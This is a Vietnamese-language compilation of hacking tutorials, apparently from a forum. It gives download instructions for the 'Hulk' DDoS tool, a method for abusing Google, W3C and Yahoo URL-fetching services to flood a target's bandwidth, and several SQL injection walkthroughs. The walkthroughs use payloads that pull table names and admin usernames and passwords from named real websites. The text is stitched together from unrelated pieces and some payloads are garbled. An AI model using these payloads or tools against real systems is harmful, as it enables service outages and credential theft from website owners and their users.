https://b27ce251cbf73a9cf88690352e6d5fa8c9107d26.googledrive.com/host/0BzPzFQt1URWNfkJUX3VKQUhmT0J3WThlZGdIcUFud3I2Zy02SXJ3M2pHMTh2c3Qza1VIQms/hulk20154.rar link download hulk
Download Python 2.7 tại đây Python Dowload Python 2.7 về và cài đặt, xong, download Hulk20154.rar về, giải nén với Pass: hackerhacker; hacker123; hackerhacker123; ko nhớ cái pass nào nữa.... giải nén xog, vào folder mới giải nén. copy file hulk20154.py rùi paste vào folder Python trog ổ C:/ với đường dẫn sau. C:/python27/ ta có được địa chỉ C:/python27/hulk20154.py. chọn Start, gõ cmd hoặc gõ trong Run -> cmd xuất hiện cổng Command Port. chạy mã sau trong Command Port. cd C:/python27 hulk20154.py http://victim.com/ nếu nó chạy --------Attack Started....-------- là đang hoạt động. còn nếu nó ra lỗi thì kiểm tra coi thử gõ sai gì ko.... *Ngoài cách này ta còn có thể copy code của Hulk, dán vào 1 file trên Koding, rùi đánh trực tiếp trên Koding với mã sau: python hulk20154.py http://victim.com/ Hulk20154.rar
Hướng dẫn tạo Google, Yahoo , WordPress DDoS ( *.txt + plus.html ) Tương tự khi ta post 1 link ảnh lên facebook note ( các bạn tạo 1 fanpages -> note -> public để khi ddos thì sẽ public hết tất cả mọi người — ko cần login ) -> Máy chủ facebook sẻ tự động tải link ảnh đó lên , và sẽ hiển thị lên facebook note của các bạn Tương tự : với Blogger.com , WordPress.com ,Twitter.com cũng như thế – Các bạn nên setup 1 vps ở Koding.com để test ( run command : netstat -n |grep :80 ) nên nhớ : khi bạn
ddos vào 1 trang web đó -> thì trang web đó sẽ ko thực thi lệnh trong trang nên khi bạn dùng LOIC ( html ddos ) vào blogger ( chứa <images > ljnk ảnh </images> ) đến phá băng thông victim thì sẽ ko đc hiện đc cho nên : chèm code html vào bloger ( hoặc wordpress ) rồi dùng file plus.html để refesh thì sẽ hiệu quả hơn còn file : kymljnk.html ( đối với ljnk đầu tiênPlus.google.com.…và link cuối cùng rss của yahoo , thì bạn phải đăng nhập với đường ljnk khi add victim vào trước …thì yahoo nó mới tấn công nhé ) => ko thì bạn ddos thì nó sẽ đứng trình duyệt của bạn p/s : đây là ddos băng thông nhé , bạn biết website sẽ sập khi băng thông hết … cho nên đừng có bảo vừa bật tool lên ddos 5′ mà web vẫn chạy là sao nhé ! ~> stupid hacker — hướng dẫn làm F5 ddos ( kymljnk.html ) các bạn tư duy thử nhé : https://plus.google.com/share?url ~> Google ddos https://drive.google.com/viewerng/viewer?url -> Google ddos http://validator.w3.org/feed/check.cgi?url -> W3 ddos https://add.my.yahoo.com/rss?url -> Yahoo ddos Link Tải Về : https://drive.google.com/file/d/0BzEN6oFWhqInbWVpbFdsbG9zN1E/view?usp=sharing sưutam
Lỗi Query
failed: You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''1''' at line 1
Dùng đoạn
lệnh này lấy ver and
extractvalue(rand(),concat(0x0a,version()))--+
Có thông
tin : "Query failed: XPATH syntax error: ' 5.1.39-log'" ==> ver
> 5
get
tablename bằng đoạn code sau: and
extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from
information_schema.tables WHERE table_schema=database() limit 0,1)))--+
Link Dạng
http://www.ianforsythphotographer.com/main.php?id=1' and
extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from
information_schema.tables WHERE table_schema=0x69665f696d61676573 limit
3,1)))--+
Ta có:
"Query failed: XPATH syntax error: ':logger_config'" tablename:
plogger_config
ta khai
thác tiếp bằng code sau: and
extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from
information_schema.columns WHERE table_name="TABLE NAME" limit 0,1)))
trong đó
table name ta thay bằng plogger_config mà ta đã check đc lúc nãy và ta có link: http://www.ianforsythphotographer.com/main.php?id=1' and
extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from
information_schema.columns WHERE table_name="plogger_config" limit
3,1)))--+
và ta có
đoạn lấy pass và username tổng hợp bằng code sau:
extractvalue(rand(),concat(0x0a,(select
concat(COLUMNS) from TABLE)))--
Trong đó
COLUMNS là hai cái column ta khai thác dc là +
admin_username +
admin_password
trong đó
columns se có dạng select concat(admin_username,0x3a,admin_password) nhớ là có
0x3a
và TABLE
là cái table ta khai thác dc lúc đầu thay vào link có dang: http://www.ianforsythphotographer.com/main.php?id=1' and
extractvalue(rand(),concat(0x0a,(select
concat(admin_username,0x3a,admin_password) from if_images.plogger_config LIMIT
0,1)))--+
iờ thì
thấy các trường bị lỗi rồi nhá 3, 6 ,7
Trường hợp
không hiện số thì ta view source để xem Hoặc nhiều cách khác
Giờ thì
check version hay user database gì đấy thì tùy mình lười nói tới, đoán chắc
trang này ver 5 trở lên nên ta đi vào tìm table luôn http://namphongcomputer.com/?php=product_detail&id=-216UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,
13,14,15 from information_schema.tables where table_schema=database()-- -
- mình
thêm vào phía sau ở đây để tránh log, vì trang này nằm trong tỉnh nên
Ax mà
sao ko thấy table nào thế này ==” Đành phải xài unhehex thôi
:-> http://namphongcomputer.com/?php=product_detail&id=-216UNION SELECT 1,2,unhehegroup_concat(table_name))),4,5,6,7,8
,9,10,11,12,13,14,15 from information_schema.tables where
table_schema=database()-- -
tbl_user
sang max hex sẽ là 74626c5f75736572 ta thêm 0x vào thành 0x74626c5f75736572. Để
đấy tí có việc http://namphongcomputer.com/?php=product_detail&id=-216UNION SELECT 1,2,unhehegroup_concat(column_name))),4,5,6,7,
8,9,10,11,12,13,14,15 from information_schema.columns where
table_schema=database() and table_name=0x74626c5f75736572-- -
Đấy
:-> Đặt phía sau table_name, ta có thể thay mã hex bằng char ( phía sau sách
tin học 11 có bảng mã ấy đấy =]]]]] )
Conversion failed
when converting the nvarchar value 'tbl_DoiTac' to data type int.
Làm
tương tự cho tới khi xuất hiện table user chứa thông tin username và password. Ở
site này table chứa thông admin đăng nhập của admin là table đầu tiên:Tbl_DangNhap
Như
thông tin khai thác được ở trên. Table chứa thông tin username và password
chính là table:tbl_DangNhap. Chính
vì vậy ta sẽ khai thác table này.
hi mọi người, hôm
nay e xin làm cái TUT khai thác SQL bypass 403, vì có nhiều bạn khỏi khai thác
nó thế nào trong rum MMD đã có
người post trang này ròi nhưng không biết nó thất lạc nơi đâu nên e xin post lại victim: http://www.badalaonline.com/product_detail.php?id=940
đầu tiên là check lổi,
thêm ' vào phía sau Warning:
mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/home/badalaon/public_html/product_detail.php on line 9
Warning:
mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/home/badalaon/public_html/product_detail.php on line 14
vẫn bt vậy tăng lên
xem các bạn nhớ là nó
chỉ có số 1 đến 100 thoi nha còn nếu như bạn order by 100-- - mà nó vẫn bt thỳ
thêm ' vào sau product_detail.php?id=940'
order by 100-- - như thế đó. tìm cột lổi của nó
5.1.56 => dễ
khai thác, nếu nó bé hơn 5 thỳ khó lắm pro mới chơi dc xem table name của
nó đây là 403 nên câu
lệnh sẽ khác 1 chút
http://www.badalaonline.com/product_detail.php?id=-940 UNION
/*!SELECT*/ 1,concat_ws(0x7c,table_name),3,4,5,6,7,8,9,10,11,1
2,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!tables*/ where
table_schema=database()-- -
nếu câu lệnh bt là:
http://www.badalaonline.com/product_detail.php?id=-940 /*!UNION
SELECT*/
1,group_concat(/*!table_name*/),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2
1,22,23 /*!from information_schema.tables where table_schema=database()*/-- -
đó như thế, hoặc
làm vậy mà k ra nữa thỳ thêm unhehex.....))
http://www.badalaonline.com/product_detail.php?id=-940 /*!UNION
SELECT*/ 1,unhehegroup_concat(/*!table_name*/))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23 /*!from information_schema.tables where table_schema=database()*/-- -
đó như thế. nó ra 1
table name là admin còn nếu đi câu lệnh
như thế mà nó k ra table name là admin ví dụ nó ra table
name là order đi, còn mình thì muốn là admin thỳ phải dùng limit
http://www.badalaonline.com/product_detail.php?id=-940 UNION
/*!SELECT*/ 1,concat_ws(0x7c,table_name),3,4,5,6,7,8,9,10,11,1
2,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!tables*/ where
table_schema=database() limit 1,1-- -
cứ năng số đó từ
0,1 - 0,2 - 0,3.................... như thế đó trong
trường hợp này thỳ nó ra admin ròi nên khỏi dùng limit
http://www.badalaonline.com/product_detail.php?id=-940 UNION
/*!SELECT*/ 1,concat_ws(0x7c,column_name),3,4,5,6,7,8,9,10,11,
12,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!columns*/ where
table_name=0x61646d696e limit 0,1-- -
nó ra 1 column name
là uname => đây là username á tăng limit lên mể
tìm column password hehe, pass =>
password ok giờ mình sẽ xem
nick admin